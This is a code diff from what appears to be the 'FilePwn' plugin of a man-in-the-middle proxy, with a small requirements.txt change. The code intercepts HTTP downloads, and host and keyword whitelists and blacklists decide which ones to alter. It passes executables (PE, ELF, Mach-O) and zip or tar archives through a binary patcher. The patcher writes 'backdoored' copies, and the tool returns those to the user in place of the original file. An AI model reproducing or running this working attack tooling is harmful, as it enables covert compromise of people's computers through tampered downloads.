-        print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
-
-        if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
-            print "[!] ZipFile over allowed size"
-            self.log.info("ZipFIle maxSize met {}".format(len(aZipFile)))
-            self.patched.put(aZipFile)
-            return
-
-        tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
-        tmpDir = '/tmp/' + tmpRan
-        tmpFile = '/tmp/' + tmpRan + '.zip'
-
-        os.mkdir(tmpDir)
-
-        with open(tmpFile, 'w') as f:
-            f.write(aZipFile)
-
-        zippyfile = zipfile.ZipFile(tmpFile, 'r')
-
-        #encryption test
-        try:
-            zippyfile.testzip()
-        except RuntimeError as e:
-            if 'encrypted' in str(e):
-                self.log.info('Encrypted zipfile found. Not patching.')
-            self.patched.put(aZipFile)
-            return
-
-        print "[*] ZipFile contents and info:"
-
-        for info in zippyfile.infolist():
-            print "\t", info.filename, info.date_time, info.file_size
-
-        zippyfile.extractall(tmpDir)
-
-        patchCount = 0
-        wasPatched = False
-
-        for info in zippyfile.infolist():
-            print "[*] >>> Next file in zipfile:", info.filename
-
-            if os.path.isdir(tmpDir + '/' + info.filename) is True:
-                print info.filename, 'is a directory'
-                continue
-
-            #Check against keywords
-            keywordCheck = True
-
-            if type(self.zipblacklist) is str:
-                if self.zipblacklist.lower() in info.filename.lower():
-                    keywordCheck = True
-            else:
-                for keyword in self.zipblacklist:
-                    if keyword.lower() in info.filename.lower():
-                        keywordCheck = True
-                        continue
-
-            if keywordCheck is True:
-                print "[!] Zip blacklist enforced!"
-                self.log.info('Zip blacklist enforced on {}'.format(info.filename))
-                continue
-
-            patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
-
-            if patchResult:
-                patchCount += 1
-                file2 = "backdoored/" + os.path.basename(info.filename)
-                print "[*] Patching complete, adding to zip file."
-                shutil.copyfile(file2, tmpDir + '/' + info.filename)
-                self.log.info("{} in zip patched, adding to zipfile".format(info.filename))
-                os.remove(file2)
-                wasPatched = True
-            else:
-                print "[!] Patching failed"
-                self.log.info("{} patching failed. Keeping original file in zip.".format(info.filename))
-
-            print '-' * 10
-
-            if patchCount >= int(self.userConfig['ZIP']['patchCount']):  # Make this a setting.
-                self.log.info("Met Zip config patchCount limit.")
-                break
-
-        zippyfile.close()
-
-        zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
-
-        print "[*] Writing to zipfile:", tmpFile
-
-        for base, dirs, files in os.walk(tmpDir):
-            for afile in files:
-                filename = os.path.join(base, afile)
-                print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
-                zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
-
-        zipResult.close()
-        #clean up
-        shutil.rmtree(tmpDir)
-
-        with open(tmpFile, 'rb') as f:
-            tempZipFile = f.read()
-        os.remove(tmpFile)
-
-        if wasPatched is False:
-            print "[*] No files were patched forwarding original file"
-            self.patched.put(aZipFile)
-            return
-        else:
-            self.patched.put(tempZipFile)
-            return
+    def set_config(self):
+        try:
+            self.user_config = self.config['FilePwn']
+            self.host_blacklist = self.user_config['hosts']['blacklist']
+            self.host_whitelist = self.user_config['hosts']['whitelist']
+            self.keys_blacklist = self.user_config['keywords']['blacklist']
+            self.keys_whitelist = self.user_config['keywords']['whitelist']
+        except Exception as e:
+            self.log.error("Missing field from config file: {0}".format(e))
+
+    def set_config_archive(self, ar):
+        try:
+            self.archive_type = ar['type']
+            self.archive_blacklist = self.user_config[self.archive_type]['blacklist']
+            self.archive_max_size = int(self.user_config[self.archive_type]['maxSize'])
+            self.archive_patch_count = int(self.user_config[self.archive_type]['patchCount'])
+            self.archive_params = ar
+        except Exception as e:
+            raise Exception("Missing {0} section from config file".format(e))
+
+    def hosts_whitelist_check(self, req_host):
+        if self.host_whitelist.lower() == 'all':
+            self.patchIT = True
+        elif type(self.host_whitelist) is str:
+            if self.host_whitelist.lower() in req_host.lower():
+                self.patchIT = True
+                self.log.info("Host whitelist hit: {0}, HOST: {1}".format(self.host_whitelist, req_host))
+        elif req_host.lower() in self.host_whitelist.lower():
+            self.patchIT = True
+            self.log.info("Host whitelist hit: {0}, HOST: {1} ".format(self.host_whitelist, req_host))
+        else:
+            for keyword in self.host_whitelist:
+                if keyword.lower() in req_host.lower():
+                    self.patchIT = True
+                    self.log.info("Host whitelist hit: {0}, HOST: {1} ".format(self.host_whitelist, req_host))
+                    break
+
+    def keys_whitelist_check(self, req_url, req_host):
+        # Host whitelist check takes precedence
+        if self.patchIT is False:
+            return None
+
+        if self.keys_whitelist.lower() == 'all':
+            self.patchIT = True
+        elif type(self.keys_whitelist) is str:
+            if self.keys_whitelist.lower() in req_url.lower():
+                self.patchIT = True
+                self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
+        elif req_host.lower() in [x.lower() for x in self.keys_whitelist]:
+            self.patchIT = True
+            self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
+        else:
+            for keyword in self.keys_whitelist:
+                if keyword.lower() in req_url.lower():
+                    self.patchIT = True
+                    self.log.info("Keyword whitelist hit: {0}, PATH: {1}".format(self.keys_whitelist, req_url))
+                    break
+
+    def keys_backlist_check(self, req_url, req_host):
+        if type(self.keys_blacklist) is str:
+            if self.keys_blacklist.lower() in req_url.lower():
+                self.patchIT = False
+                self.log.info("Keyword blacklist hit: {0}, PATH: {1}".format(self.keys_blacklist, req_url))
+        else:
+            for keyword in self.keys_blacklist:
+                if keyword.lower() in req_url.lower():
+                    self.patchIT = False
+                    self.log.info("Keyword blacklist hit: {0}, PATH: {1}".format(self.keys_blacklist, req_url))
+                    break
+
+    def hosts_blacklist_check(self, req_host):
+        if type(self.host_blacklist) is str:
+            if self.host_blacklist.lower() in req_host.lower():
+                self.patchIT = False
+                self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
+        elif req_host.lower() in [x.lower() for x in self.host_blacklist]:
+            self.patchIT = False
+            self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
+        else:
+            for host in self.host_blacklist:
+                if host.lower() in req_host.lower():
+                    self.patchIT = False
+                    self.log.info("Host Blacklist hit: {0} : HOST: {1} ".format(self.host_blacklist, req_host))
+                    break

     def parse_target_config(self, targetConfig):
-        for key, value in targetConfig.iteritems():
+        for key, value in targetConfig.items():
             if hasattr(self, key) is False:
                 setattr(self, key, value)
-                self.log.debug("Settings Config {}: {}".format(key, value))
+                self.log.debug("Settings Config {0}: {1}".format(key, value))

             elif getattr(self, key, value) != value:

                 if value == "None":
                     continue

-                #test if string can be easily converted to dict
+                # test if string can be easily converted to dict
                 if ':' in str(value):
-                    for tmpkey, tmpvalue in dict(value).iteritems():
+                    for tmpkey, tmpvalue in dict(value).items():
                         getattr(self, key, value)[tmpkey] = tmpvalue
-                        self.log.debug("Updating Config {}: {}".format(tmpkey, tmpvalue))
+                        self.log.debug("Updating Config {0}: {1}".format(tmpkey, tmpvalue))

                 else:
                     setattr(self, key, value)
-                    self.log.debug("Updating Config {}: {}".format(key, value))
+                    self.log.debug("Updating Config {0}: {1}".format(key, value))

     def response(self, response, request, data):
-        content_header = response.headers['Content-Type']
-        content_length = int(response.headers['Content-Length'])
+        content_header = response.headers['content-type']
         client_ip = request.client.getClientIP()
+        host = request.headers['host']
+
+        try:
+            content_length = int(response.headers['content-length'])
+        except KeyError:
+            content_length = None

-        for target in self.userConfig['targets'].keys():
+        for target in self.user_config['targets'].keys():
             if target == 'ALL':
-                self.parse_target_config(self.userConfig['targets']['ALL'])
+                self.parse_target_config(self.user_config['targets']['ALL'])

             if target in request.headers['host']:
-                self.parse_target_config(self.userConfig['targets'][target])
+                self.parse_target_config(self.user_config['targets'][target])

-        if content_header in self.zipMimeTypes:
-
-            if self.bytes_have_format(data, 'zip'):
-                self.clientlog.info("Detected supported zip file type!", extra=request.clientInfo)
-
-                process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
-                process.daemon = True
-                process.start()
-                #process.join()
-                bd_zip = self.patched.get()
-
-                if bd_zip:
-                    self.clientlog.info("Patching complete, forwarding to client", extra=request.clientInfo)
-                    return {'response': response, 'request': request, 'data': bd_zip}
-
-            else:
-                for tartype in ['gz','bz','tar']:
-                    if self.bytes_have_format(data, tartype):
-                        self.clientlog.info("Detected supported tar file type!", extra=request.clientInfo)
-
-                        process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
-                        process.daemon = True
-                        process.start()
-                        #process.join()
-                        bd_tar = self.patched.get()
-
-                        if bd_tar:
-                            self.clientlog.info("Patching complete, forwarding to client!", extra=request.clientInfo)
-                            return {'response': response, 'request': request, 'data': bd_tar}
-
-        elif (content_header in self.binaryMimeTypes) and (content_length <= self.FileSizeMax):
-            for bintype in ['pe','elf','fatfile','machox64','machox86']:
-                if self.bytes_have_format(data, bintype):
-                    self.clientlog.info("Detected supported binary type ({})!".format(bintype), extra=request.clientInfo)
-                    fd, tmpFile = mkstemp()
-                    with open(tmpFile, 'w') as f:
-                        f.write(data)
-
-                    process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
-                    process.daemon = True
-                    process.start()
-                    #process.join()
-                    patchb = self.patched.get()
-
-                    if patchb:
-                        bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
-                        os.remove('./backdoored/' + os.path.basename(tmpFile))
-                        self.clientlog.info("Patching complete, forwarding to client", extra=request.clientInfo)
-                        return {'response': response, 'request': request, 'data': bd_binary}
-                    else:
-                        self.clientInfo.info("Patching Failed!", extra=request.clientInfo)
-
-        self.clientlog.debug("File is not of supported content-type: {}".format(content_header), extra=request.clientInfo)
+        self.hosts_whitelist_check(host)
+        self.keys_whitelist_check(request.uri, host)
+        self.keys_backlist_check(request.uri, host)
+        self.hosts_blacklist_check(host)
+
+        if content_length and (content_length >= long(self.FileSizeMax)):
+            self.clientlog.info("Not patching over content-length, forwarding to user", extra=request.clientInfo)
+            self.patchIT = False
+
+        if self.patchIT is False:
+            self.clientlog.info("Config did not allow patching", extra=request.clientInfo)
+        else:
+            mime_type = magic.from_buffer(data, mime=True)
+
+            if mime_type in self.binaryMimeType['mimes']:
+                tmp = tempfile.NamedTemporaryFile()
+                tmp.write(data)
+                tmp.flush()
+                tmp.seek(0)
+
+                patchResult = self.binaryGrinder(tmp.name)
+                if patchResult:
+                    self.clientlog.info("Patching complete, forwarding to user", extra=request.clientInfo)
+
+                    bd_file = os.path.join('backdoored', os.path.basename(tmp.name))
+                    with open(bd_file, 'r+b') as file2:
+                        data = file2.read()
+                        file2.close()
+
+                    os.remove(bd_file)
+                else:
+                    self.clientlog.error("Patching failed", extra=request.clientInfo)
+
+                # add_try to delete here
+                tmp.close()
+            else:
+                for archive in self.archiveTypes:
+                    if mime_type in archive['mimes'] and self.str2bool(self.CompressedFiles) is True:
+                        try:
+                            self.set_config_archive(archive['params'])
+                            data = self.inject(data)
+                        except Exception as exc:
+                            self.clientlog.error(exc, extra=request.clientInfo)
+                            self.clientlog.warning("Returning original file", extra=request.clientInfo)

         return {'response': response, 'request': request, 'data': data}
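Note: taken together, the four new check methods give whitelists the power to enable patching and blacklists an unconditional veto applied afterwards. A condensed, self-contained approximation of that decision order (simplified to plain substring matching on string-valued settings; the real methods also handle list-valued config entries and log every hit):

    def should_patch(host, uri, host_wl='ALL', keys_wl='ALL', keys_bl=(), host_bl=()):
        # whitelists enable...
        patch = (host_wl == 'ALL') or (host_wl.lower() in host.lower())
        if patch and keys_wl != 'ALL':
            patch = keys_wl.lower() in uri.lower()
        # ...blacklists veto
        if any(k.lower() in uri.lower() for k in keys_bl):
            patch = False
        if any(h.lower() in host.lower() for h in host_bl):
            patch = False
        return patch

    print should_patch('www.example.com', '/files/tool.exe', host_bl=('example.com',))   # False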
|
@ -1,4 +1,5 @@
|
||||||
git+git://github.com/kti/python-netfilterqueue
|
git+git://github.com/kti/python-netfilterqueue
|
||||||
|
git+git://github.com/gorakhargosh/watchdog
|
||||||
pycrypto>=2.6
|
pycrypto>=2.6
|
||||||
pyasn1>=0.1.7
|
pyasn1>=0.1.7
|
||||||
cryptography
|
cryptography
|
||||||
|
@ -17,7 +18,7 @@ Flask
|
||||||
dnspython
|
dnspython
|
||||||
beautifulsoup4
|
beautifulsoup4
|
||||||
capstone
|
capstone
|
||||||
|
python-magic
|
||||||
msgpack-python
|
msgpack-python
|
||||||
watchdog
|
|
||||||
requests
|
requests
|
||||||
pypcap
|
pypcap
|